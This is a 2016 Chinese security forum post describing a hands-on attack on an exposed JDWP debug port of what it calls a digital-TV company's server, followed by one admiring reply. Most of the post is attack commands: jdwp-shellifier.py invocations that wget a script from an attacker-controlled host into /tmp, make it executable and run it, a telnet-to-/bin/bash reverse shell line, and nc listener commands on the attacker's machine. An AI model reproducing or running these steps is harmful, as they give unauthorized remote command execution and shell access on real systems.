首页
社区
课程
招聘
[旧帖] [推荐]jdwp 反弹 shell 实战案例 0.00雪花
发表于: 2016-7-7 11:06 2778

[旧帖] [推荐]jdwp 反弹 shell 实战案例 0.00雪花

2016-7-7 11:06
2778
反弹shell实战案列:
测试中遇到一个某数字电视jdwp 漏洞,
域名:351K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4S2^5P5q4)9J5k6i4S2^5P5s2S2^5i4K6u0W2j5$3!0E0i4K6u0W2j5$3&6Q4x3@1p5^5x3o6R3H3i4K6u0r3
扫描端口:

发现8000端口 开放jdwp
上利用exp:
(jdwp-shellifier.py )
利用条件需要先访问一下web应用 ,然后执行exp
用法 jdwp-shellifier.py -t 目标IP -p 端口 --cmd "cmd命令"

接下来反弹shell操作:
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "wget e6fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4S2Q4x3X3g2^5i4K6u0W2P5q4)9J5k6i4S2Q4x3V1k6^5i4K6u0W2N6s2S2@1 -O /tmp/x.sh"
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "chmod a+x /tmp/x.sh"
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "/tmp/x.sh"
其中 x.txt内容如下:
telnet x.x.x.x 1111 | /bin/bash | telnet x.x.x.x 3333
(x.x.x.x 为你自己的外网pc,有路由记得做转发)
然后在x.x.x.x服务器上用nc监听1111端口和3333端口
1111端口是发送命令,3333回显命令结果的
两个cmd窗口

nc -nnv -L -p 3333
nc -nnv -L -p 1111
实际操作:
jdwp-shellifier.py -t *.*.*.* -p 8000 --cmd "wget 062K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4A6i4K6u0W2P5s2S2^5P5s2S2Q4x3X3g2U0L8$3#2Q4x3V1k6H3K9h3y4Q4x3X3g2@1P5s2b7`. -O /tmp/x.sh"
jdwp-shellifier.py -t  *.*.*.* -p 8000 --cmd "chmod a+x /tmp/x.sh"
jdwp-shellifier.py -t *.*.*.* -p 8000 --cmd "/tmp/x.sh"
(其中aa8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4A6i4K6u0W2P5s2S2^5P5s2S2Q4x3X3g2U0L8$3#2Q4x3V1k6H3K9h3y4Q4x3X3g2@1P5s2b7`. ,为我事先准备好的一个下载地址,也就是x.txt的内容)

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
很牛,学习了!!~
2016-7-9 04:28
0
游客
登录 | 注册 方可回帖
返回